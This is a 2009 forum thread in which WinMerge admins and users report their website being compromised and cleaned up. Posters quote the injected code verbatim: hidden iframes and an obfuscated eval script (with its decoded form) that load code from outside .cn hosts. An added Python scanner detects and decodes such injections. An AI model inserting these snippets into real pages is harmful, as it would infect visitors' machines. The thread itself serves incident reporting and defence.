winmerge.org webpages was COMPROMISED!


winmerge.org webpages was COMPROMISED!

Postby gerundt » Wed Apr 15, 2009 8:42 pm

Christian, Dean and I got a not so nice mail today:
Arjen Kaldenbach wrote:
Hi,

My ESET AV popped up when I visited the winmerge homepage minutes ago.
It seems some hidden iframes are injected, for example on the homepage:

</html>

<iframe src="http://betbigwager.cn/in.cgi?income61" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betbigwager.cn/in.cgi?income62" width=1 height=1 style="visibility: hidden"></iframe>

I googled around, I read something like it could be a virus/trojan taking over a ftp client? see: http://lip-service.joygoround.com/?p=129

Sincerely,

Arjen Kaldenbach


Unfortunately, Arjen was right, and I found 13 compromised index.(php|html) files. :(

  • index.php
  • about\index.php
  • about\screenshots\index.php
  • docs\old\manual-2.6\index.html
  • docs\old\manual-2.8\index.html
  • docs\old\usersguide-1.7\index.html
  • docs\old\usersguide-2.0\index.html
  • downloads\index.php
  • support\index.php
  • translations\index.php
  • Wiki\index.php
  • Wiki\config\index.php
  • Wiki\extensions\SyntaxHighlight_GeSHi\geshi\docs\api\index.html

I also think that some virus/trojan is taking over an FTP client of ours:
http://www.sulumitsretsambew.org/iframe-worms/

I checked my PC but didn't find anything. Other websites I manage have no iframes. So I hope I am not the infected user. :shock:

My FTP client says most index files were changed at "2009-04-14 15:46". The FTP log files say something about "[14/Apr/2009:08:38:40 -0500]".

Can you check your PCs?
gerundt
Site Admin
 
Posts: 193
Joined: Wed Sep 24, 2008 8:47 am
Location: Germany

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Wed Apr 15, 2009 9:44 pm

I use the NOD32 virus checker and no viruses/trojans were found.
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland

Re: winmerge.org webpages was COMPROMISED!

Postby merk » Wed Apr 22, 2009 2:07 am

My AV (avast) is reporting a virus when I try to go to the manual page: HTML:Iframe-inf
merk
 
Posts: 3
Joined: Tue Apr 07, 2009 6:11 pm

Re: winmerge.org webpages was COMPROMISED!

Postby arinlares » Sun Apr 26, 2009 8:33 am

I got a warning using Avast today, and was told by somebody else using Dr. Web after running the url through the program.
arinlares
 
Posts: 3
Joined: Sun Apr 26, 2009 12:48 am

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Mon Apr 27, 2009 1:55 pm

I've rebuilt the manual and uploaded clean files to WinMerge.org.
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland

Re: winmerge.org webpages was COMPROMISED!

Postby arinlares » Tue Apr 28, 2009 11:31 pm

Cool. I went to the Manual, and it was clean. Thank you.
arinlares
 
Posts: 3
Joined: Sun Apr 26, 2009 12:48 am

Re: winmerge.org webpages was COMPROMISED!

Postby noxwizard979 » Sun May 17, 2009 3:25 am

It appears to have happened again. This has been inserted before the <body> tag:
<script language=javascript><!--
(function(Q08g){var v9y1='%';eval(unescape((',76,61r,20a,3d,22Script,45n,67,69,6e,65,22,2cb,3d,22,56,65rsi,6fn()+,22,2cj,3d,22,22,2cu,3dnav,69gator,2euse,72Ag,65nt,3bif((u,2eindexOf(,22Chro,6de,22),3c0),26,26(u,2einde,78Of(,22,57in,22),3e0,29,26,26(u,2ei,6edexO,66,28,22NT,20,36,22),3c0),26,26(do,63,75ment,2ecookie,2ei,6e,64exOf(,22mi,65k,3d1,22),3c0),26,26,28,74,79p,65o,66,28zrv,7ats),21,3dtypeo,66(,22,41,22),29),7bzrv,7ats,3d,22A,22,3b,65val(,22if(window,2e,22+,61+,22),6a,3dj,2b,22,2ba+,22Majo,72,22,2bb+,61+,22,4d,69n,6fr,22+b+a+,22Build,22+,62+,22j,3b,22),3bdo,63ument,2ewrite,28,22,3cscript,20src,3d,2f,2fm,22+,22,61rtu,7a,2ecn,2fvid,2f,3fi,64,3d,22+,6a+,22,3e,3c,5c,2f,73cript,3e,22),3b,7d').replace(Q08g,v9y1)))})(/\,/g);
 --></script>

which becomes:
eval('var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}');


At the end of the page, this has also been inserted:
<iframe src="http://findbigbearproperty.cn:8080/ts/in.cgi?pepsi9" width=2 height=4 style="visibility: hidden"></iframe>
noxwizard979
 
Posts: 2
Joined: Sun May 17, 2009 3:17 am
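Added example (Python; not code from this thread, from WinMerge or from any of the posters): a defender-side scan that covers both injection patterns reported here, the hidden 1x1 iframes appended after </html> that gerundt listed in the first post and the comma-escaped eval(unescape(...)) block noxwizard979 found before <body>. The deobfuscation step does what the injected wrapper itself does (replace the separator with '%' and URL-decode), so it turns a quoted payload into readable code without executing it; applied to the string quoted above it yields the document.write(...) script shown. The sample page, the callback host (callback.invalid) and the short payload are constructed; the ',' separator is an assumption taken from the /\,/g argument of the quoted script.

```python
"""Scan an HTML document for the two injection patterns described in the thread.
Constructed example; hosts use the reserved .invalid TLD, not the thread's."""
import re
from urllib.parse import unquote

# iframe hidden via inline style; capture the src so the operator can record
# the callback host without visiting it.
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*\bsrc=[\"']?(?P<src>[^\"'\s>]+)[^>]*visibility:\s*hidden[^>]*>",
    re.IGNORECASE,
)

# The escaped payload literal inside eval(unescape(('...').replace(SEP, '%')))
EVAL_UNESCAPE_RE = re.compile(
    r"eval\(unescape\(\(\s*'(?P<payload>[^']*)'\s*\)\.replace\(",
    re.DOTALL,
)

HTML_CLOSE_RE = re.compile(r"</html>", re.IGNORECASE)


def deobfuscate(payload: str, sep: str = ",") -> str:
    """Undo the ',XX' -> '%XX' -> character encoding the injected wrapper performs.
    sep=',' is an assumption based on the /\\,/g argument seen in the thread."""
    return unquote(payload.replace(sep, "%"))


def find_hidden_iframes(html: str) -> list:
    """Return the src of every iframe whose inline style hides it."""
    return [m.group("src") for m in HIDDEN_IFRAME_RE.finditer(html)]


def find_obfuscated_scripts(html: str) -> list:
    """Return the decoded body of every eval(unescape(...)) wrapper found."""
    return [deobfuscate(m.group("payload")) for m in EVAL_UNESCAPE_RE.finditer(html)]


def trailing_content(html: str) -> str:
    """Anything after the last </html>: a clean page has nothing there."""
    closes = list(HTML_CLOSE_RE.finditer(html))
    if not closes:
        return ""
    return html[closes[-1].end():].strip()


def scan_page(html: str) -> dict:
    """Collect all findings and a single verdict for one document."""
    decoded = find_obfuscated_scripts(html)
    findings = {
        "hidden_iframes": find_hidden_iframes(html),
        "decoded_scripts": decoded,
        "trailing_after_html": trailing_content(html),
    }
    findings["suspicious"] = bool(
        findings["hidden_iframes"] or decoded or findings["trailing_after_html"]
    )
    return findings


# Constructed sample page: clean markup plus both injection patterns.
# The payload decodes to document.write("x"), a harmless stand-in.
SAMPLE_PAGE = """<html><head><title>demo</title>
<script language=javascript><!--
(function(Q08g){var v9y1='%';eval(unescape((',64,6fcument,2ewrite(,22x,22)').replace(Q08g,v9y1)))})(/\\,/g);
 --></script>
</head><body><p>hello</p></body>
</html>

<iframe src="http://callback.invalid/in.cgi?demo" width=1 height=1 style="visibility: hidden"></iframe>
"""

if __name__ == "__main__":
    for key, value in scan_page(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```

Run it against every index.php / index.html under the web root (for example with os.walk) rather than against one file; the injected blocks were found in a dozen index files at once, and the trailing-content check catches the appended iframes even if the attacker changes the style attribute.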

Re: winmerge.org webpages was COMPROMISED!

Postby gerundt » Sun May 17, 2009 4:41 pm

Ok, I cleaned (hopefully) all infected files (again)! And I also found a "PHP/C99Shell.CB" backdoor on the website and deleted it!
gerundt
Site Admin
 
Posts: 193
Joined: Wed Sep 24, 2008 8:47 am
Location: Germany

Re: winmerge.org webpages was COMPROMISED!

Postby noxwizard979 » Mon May 18, 2009 6:02 pm

I don't know if you've looked into this any, but the script that affected your site is a new version of Gumblar.
http://blog.unmaskparasites.com/2009/05 ... r-exploit/

It travels in the same way and affects files in the same manner as well. It appears to get installed to the client's machine as spyware and then grabs your FTP credentials to make the changes to the files.
noxwizard979
 
Posts: 2
Joined: Sun May 17, 2009 3:17 am

Re: winmerge.org webpages was COMPROMISED!

Postby kimmov » Mon May 18, 2009 7:17 pm

I haven't read much about the subject myself - shortly, something when the infection happened for the first time.

During the weekend there was some private mail discussion between a few developers and all FTP passwords were changed. So hopefully we are safe now. Of course this should not have happened at all.

I'm hoping WinSCP + SFTP is still a safe combination. :geek:
kimmov
 
Posts: 562
Joined: Thu Sep 11, 2008 8:51 pm
Location: Finland
